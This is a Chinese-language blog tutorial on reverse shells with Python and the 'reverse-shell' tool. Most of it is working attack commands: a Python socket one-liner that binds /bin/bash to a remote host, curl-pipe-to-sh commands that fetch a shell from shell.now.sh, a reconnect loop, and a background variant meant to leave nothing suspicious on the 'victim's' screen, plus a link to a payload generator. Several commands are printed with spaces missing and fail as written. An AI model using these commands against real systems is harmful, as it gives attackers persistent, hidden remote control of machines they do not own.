python与安全（四）shell反弹

此文章为原创连载文章，关注公众号，持续更新。

欢迎投稿及转载，标明来源作者即可。

原理:

又到了小生归一 的笔记分享~有人期待嘛~

反弹shell，就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。

反弹shell通常被用于因防火墙、权限不足、端口占用等情况下。

1.目标主机在内网，无法直接连接

2.目标主机IP动态改变

3.由于防火墙等的限制，只能目标主机发送请求，不能接收请求

4.目标是获取目标主机的shell

我们常用socket模块进行反弹shell.

常用姿势：

python -c 'import 
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.3.251",8080));os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

在网上我们也可以找到反弹shell姿势，所以我就不在多写了。

有的SSTI中的姿势也可以借鉴过来.

工具

1.姿势查找

这是p神在星球分享的工具，有各种环境的姿势，非常全面。

工具地址：https://krober.biz/misc/reverse_shell.php?ip=3.11.178.242&port=443

2.reverse-shell

（1）监听连接

在您的机器上，打开一个端口并进行监听。您可以使用netcat轻松完成此操作。

nc-l 1337

（2）在目标上执行反向Shell

在目标计算机上，将https://shell.now.sh/yourip:port的输出通过管道传递到sh。

curlhttps://shell.now.sh/192.168.0.69:1337 |sh

回到您的机器，您现在应该有一个shell提示。

（3）您可以使用主机名代替IP。

curlhttps://shell.now.sh/localhost:1337 |sh

（4）远程连接

因为这是反向连接，所以它可以穿透防火墙并连接到Internet。您可以在evil.com上的服务器上侦听连接，并从安全网络内部获得反向外壳。

curlhttps://shell.now.sh/evil.com:1337 |sh

（5）持续连接

默认情况下，当外壳退出时，您将失去连接。您可能会通过无效命令意外地执行此操作。您可以通过将其包装在while循环中来轻松创建将尝试重新连接的shell。

whiletrue;docurl https://shell.now.sh/yourip:1337 |sh;done

（6）作为后台进程运行

终端会话需要保持打开状态以保持反向外壳连接。

以下命令将在后台进程中运行反向外壳程序并退出终端，在受害者的计算机上没有打开看起来可疑的终端窗口。

确保在新的终端窗口中运行此命令，否则将丢失现有会话中的任何工作。

sh-c "curlhttps://shell.now.sh/localhost:1337 | sh -i &"&&exit

工具地址：https://github.com/lukechilds/reverse-shell